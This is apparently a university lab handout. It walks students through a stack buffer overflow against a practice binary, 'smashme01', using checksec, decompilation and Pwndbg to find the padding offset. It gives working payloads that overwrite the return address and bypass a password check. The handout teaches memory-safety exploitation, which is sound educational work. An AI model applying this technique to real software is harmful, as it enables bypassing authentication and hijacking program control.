Guided Example

Stack smashing is a type of buffer overflow attack where an attacker overwrites a program's call stack, typically by overflowing a buffer. Doing so the attacker can corrupt a return address on the stack and hijack the program's control flow, to e.g. bypass security check, spawn a shell, and more generally execute malicious code. A classic explanation of the stack smashing attack can be found in Aleph One’s seminal Phrack article: Smashing The Stack For Fun And Profit.

To demonstrate an example of stack smashing, we assume the following scenario: we consider a program containing a security check (e.g. password or license key verification). We (the attacker) do not have knowledge of the secret allowing to pass the check legitimately, and there is no simple way to extract it as we did in lab 1. Hence, our goal is going to be to bypass the security check, by taking over the program execution's flow. The program is distributed in binary form, and we do not have access to its source code.

Getting and Running the Target Binary

Download this binary. After the download you may need to give it execution rights with chmod +x smashme01. This program contains a password check. The user enters their password attempt as a command line parameter:

./smashme01
usage: ./smashme01 <password>

./smashme01 test
Authentication failed

Analysing the Target Binary with `checksec`

Let's start by analysing the program with checksec, which is a command-line tool that inspects compiled binaries to display their security-related properties.

If checksec is not already on your machine, install it:
mkdir -p ~/Software
wget https://github.com/slimm609/checksec/tarball/main -O ~/Software/checksec.tar.gz
cd ~/Software && tar xf checksec.tar.gz && mv slimm609-checksec-* checksec
echo "alias checksec=~/Software/checksec/checksec.bash" >>  ~/.bashrc
source ~/.bashrc
Adapt these steps to your environment (e.g. you may use a different shell).

checksec --file=smashme01
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   5 Symbols	  No	0		2		smashme01

This looks promising, here we can see that:

The stack canary, which is a protection against buffer overflows on the stack, is disabled. It means we will be able to exploit such overflows.
Position Independent Code (PIE) is disabled. This built time option, when enabled, allow the location where the binary is loaded in the address space to be randomised (i.e. different) each time the program is launched. No randomisation means we will mostly get the same memory layout throughout subsequent executions, which makes it easier to study.
Symbols are present: symbols are things like function and global variable names. The fact that they are present in the binary means that disassembly/decompilation will be able to do a better job, e.g. break down the code section into functions, identify them by their name, etc.

Disassembling and Decompiling the Target Binary

If we disassemble the program with objdump, we can see that it is made up of a few functions, including:

main
init
validate
do_important_stuff
Other functions which name cannot be recovered

Let's study a few of these functions more in detail. Decompiling the program (e.g. with RetDec) will allow us to get a better understanding of what they do. Let's start by looking at main. Decompiled by RetDec it looks like that (you may see different values for the addresses):

// Address range: 0x401a94 - 0x401b21
int main(int argc, char ** argv) {
    int64_t * v1 = (int64_t *)((int64_t)argv + 8); // 0x401add
    init(*v1);
    if ((int32_t)validate(*v1) == 0) {
        // 0x401b0b
        puts("Authentication failed");
    } else {
        // 0x401aff
        do_important_stuff();
    }
    // 0x401b1a
    return 0;
}

We can see that main gets the first command line argument from argv (argv + 8 corresponds to argv[1]), passes it to init, then to validate. If validate returns 0, it prints Authentication failed, else it calls do_important_stuff. Decompiled, do_important_stuff looks like this:

int64_t do_important_stuff(void) {
    // 0x401a06
    puts("Authentication successful");
    // ...
}

Clearly, this function is executed on the code path taken when authentication succeeds: that will be where we want to jump when we hijack the execution flow. Now let's look at validate:

int64_t validate(int64_t str) {
    int64_t result = 0; // 0x4018bc
    if (strlen((char *)str) == 40) {
        // 0x4018c5
        int64_t str2; // bp-152, 0x401885
        function_4016aa(str, &str2);
        result = memcmp(&g1, &str2, 40) == 0;
    }
    // 0x401905
    return result;
}

This function performs a length check on the password attempt (str), then passes it as parameter to another function (function_4016aa) alongside the address of a local variable str2. The local variable is then compared with memcmp to a global variable g1, and validate returns 0 if the comparison fails (memcmp returned something else than 0), and 1 if it succeeds (memcmp returned 0).

Recall that from how it is called in main, we know that validate returns 0 if the authentication failed, and something else if it succeeded. The validate function presents a structure typical of a hash check: the password attempt str is hashed into str2, and that hash is compared to g1 which is probably the hash of the correct password. We can also conclude that function_4016aa implements the hashing logic.

Although we can extract the hash of the correct password, we won't be able to crack it with a bruteforce or dictionary attack: for this exercise the passwords have been generated to be long and complex enough to be uncrackable in a reasonable time. Moreover, the hashing method seems custom and hard to reverse-engineer (function_4016aa is quite complex). Instead, we are going to attempt to entirely bypass the check, i.e. force the CPU to jump directly to do_important_stuff without calling validate and checking its return value.

Let's now have a look at init:

int64_t init(int64_t str2) {
    // 0x401a6e
    int64_t str; // bp-40, 0x401a6e
    return (int64_t)strcpy((char *)&str, (char *)str2);
}

This function calls strcpy to copy the password attempt coming from the command line (str2) into str, which points to the stack (bp is the base pointer that at runtime will point to the base of the stack frame for function). Given how strcpy works, str points to a buffer of fixed size, and as we can observe the program makes no attempt to check that str2 will not overflow that buffer.

To try to trigger the overflow, call the program with an abnormally long string given as password attempt:

./smashme01 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[1]    20866 segmentation fault  ./smashme01 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Function Calls and the Stack

Recall from the lectures that the machine code generated by the compiler pushes the return address on the stack upon a function call, and pops it then jumps to it when that function returns:

So with our target program, our goal to bypass the validation of the password attempt will be to overflow the buffer during function's execution through the strcpy in such a way to replace the return address with the address of our target: do_important_stuff.

Doing so, when function returns, the CPU will jump to do_important_stuff, bypassing the password check.

Understanding the Address Space Layout

Attack Payload: Overview

We have control over the data that will be written on the stack through the overflow: indeed that data comes from the command line argument passed to the program. The question here is what exactly should we pass as command line parameter so that the address of the function we want to jump to ends up written in the exact return address slot. This is our payload, and we should determine 1) how long should it be and 2) what should it contain for the attack to succeed. Our payload should be a concatenation of two things:

A certain amount of padding corresponding to the distance between the start of the buffer we overflow and the return address slot on the stack (see diagram above).
The address of do_important_stuff to be written in the return address slot.

Determining the address of do_important_stuff is easy: from our investigation with checksec we know that the program does not support PIE so the address of do_important_stuff will always be the same among different invocations of the program. It can be determined e.g. in objdump's output:

objdump --disassemble smashme01 | grep do_important_stuff
0000000000401a06 <do_important_stuff>:

Here its address is 0x401a06 (it may be different on your computer).

To determine how much padding our payload should contain before that address, we need to understand the memory layout on the stack at the time the overflow occur. To that aim we will use GDB and an addon called Pwndbg, which offers a better interface and many helpful features for reverse engineering.

Installing and Running Pwndbg

To install Pwndbg download a release as follows:

mkdir -P ~/Software
cd ~/Software
wget https://github.com/pwndbg/pwndbg/releases/download/2025.04.18/pwndbg_2025.04.18_x86_64-portable.tar.xz
tar xf pwndbg_2025.04.18_x86_64-portable.tar.xz && rm pwndbg_2025.04.18_x86_64-portable.tar.xz
echo "export PATH=\$PATH:~/Software/pwndbg/bin" >> ~/.bashrc
source ~/.bashrc

Pwndbg can then be launched as follows:

pwndbg smashme01
pwndbg>

To explore the Pwndbg's interface, place a breakpoint on main and run the program until it is hit:

pwndbg> break main
Breakpoint 1, 0x0000000000401a9c in main ()
pwndbg> run

Once the breakpoint is hit Pwndbg will display a lot more information vs. vanilla GDB. The screen is divided into 4 main blocks:

REGISTERS displays the content of the registers: the general purpose ones RAX to R15, the base pointer RBP, the stack pointer RSP, as well as the instruction pointer RIP.
DISASM displays a disassembly of the machine code, with the next instruction to be executed having its address highlighted in green.
STACK gives the content of the stack, one stack slot per line. The address of each slot is given on the right, and its content on the left. The first line represents the top of the stack, notice that its address is the same as the content of the stack pointer register RSP.
BACKTRACE shows the function call stack: the CPU currently runs belonging to main, which was previously called by __libc_start_call_main, which itself was called by __libc_start_main, which was called by _start. These last 3 functions implement the C standard library code that runs before main is invoked.

Pwndbg supports all GDB commands (e.g. break, run, etc.) and provides additional ones. You can explore these commands on this cheat sheet and on the relevant documentation.

Determining the Amount of Padding

Let's start by setting a breakpoint in the function containing the overflow, init, and run the program with a dummy password, xxx.

pwndbg> break init
Breakpoint 1 at 0x401a76
pwndbg> run xxx

When the breakpoint is hit, use the ni command to continue execution until the call to strcpy is highlighted, i.e. right before that call is made:

 ► 0x401a8c <init+30>    call   strcpy@plt                  <strcpy@plt>
        dest: 0x7fffffffdaf0 ◂— 0
        src: 0x7fffffffe00a ◂— 0x474e414c00787878 /* 'xxx' */

Pwndbg is aware of the calling convention and indicates the value of strcmp's parameters:

The source src points to the dummy password attempt we entered, xxx
The destination dest points to the buffer that we are going to overflow, here its value is 0x7fffffffdaf0.

Now to understand how much padding we need to include in our payload, we need to know how many bytes separate 0x7fffffffdaf0 from the location of the return address on the stack. The return address is located right before the base pointer, so we can display it with the following command:

pwndbg> x/gx $rbp+8
0x7fffffffdb18:	0x0000000000401ae8

Remember that the stack grows down so here we are looking at the 8 bytes present right before the base pointer. The return address is then 0x401ae8 (location in main where it was called), and it is located on the stack at 0x7fffffffdb18. We can now compute the distance between the return address 0x7fffffffdb18 and the first byte of the buffer we are going to overflow 0x7fffffffdaf0. In a separate terminal:

$ python3 -c "print(0x7fffffffdb18 - 0x7fffffffdaf0)"
40

Our payload will then be 40 bytes of padding, followed by the address of do_important_stuff.

Smashing the Stack

We determined earlier the address of do_important_stuff to be 0x401a06, so the execution of our attack is as follows:

$ ./smashme01 $'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x06\x1a\x40\x00\x00\x00\x00\x00'

The first 40 characters (each 1 byte) can be anything. Notice how the address we want to jump to is written backwards. This is because x86-64 is little-endian: the least significant byte of a multi-byte data type is stored at the lowest memory address.

The program should display the password that you have to submit to validate the exercise.

An Easier Way to Determine Padding Size

Determining the amount of padding required manually as we did can be quite cumbersome. An easier method, provided by Pwndbg, is to use a cyclic pattern. This is a long, unique, non-repeating sequence of characters, that we will use to overflow the buffer. Looking at what part of that sequence the execution flow ends up jumping to after the return address is overwritten will let Pwndbg compute easily the distance between the start of the buffer overflow, and the return address location.

To generate the cyclic pattern, we can use the built-in cyclic function within pwndbg. This is an example for generating 200 bytes of cyclic pattern:

pwndbg> cyclic 200
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa

⚠️ For some reason using cyclic before having run the program in a Pwndbg session at least once leads to problems. Each time you launch Pwndbg make sure to type run at least once before using cyclic.

Your cyclic function may generate a different pattern. Now run the program and copy paste the patter as its command line parameter:

pwndbg> run aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa

Part of this pattern will overwrite the return value, then the CPU will try to jump to the overwritten value. Because it does not correspond to a valid address, the program will crash and Pwndbg will indicate us where the CPU tried to jump:

 ► 0x401a93 <init+37>    ret                                <0x6161616161616166>

This is the subset of the pattern (in hexadecimal) that overwrote the return address. Pwndbg has a convenient function to locate the offset of that subset from the start of the last pattern generated:

pwndbg> cyclic -l 0x6161616161616166
Finding cyclic pattern of 8 bytes: b'faaaaaaa' (hex: 0x6661616161616161)
Found at offset 40

And there we have it: this is the distance between the start of the overflown buffer and the return address, i.e. the amount of padding required for our payload.

Quick Payload Generation with Python

Rather than writing the payload manually, a quick and easy way to generate it is with Python, writing the payload on a file:

$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*40 + (0x401a06).to_bytes(8, 'little'))" > input.txt
$ ./smashme01 $(cat input.txt)

Here 40 is the amount of padding added, and 0x401a06 is our jump target.

Submission Instructions

Input the password extracted on the corresponding line of the CSV file in the submission git repository, i.e.:

smashme01,password-here

Keyboard shortcuts

COMP60261 Lab 2: Memory Safety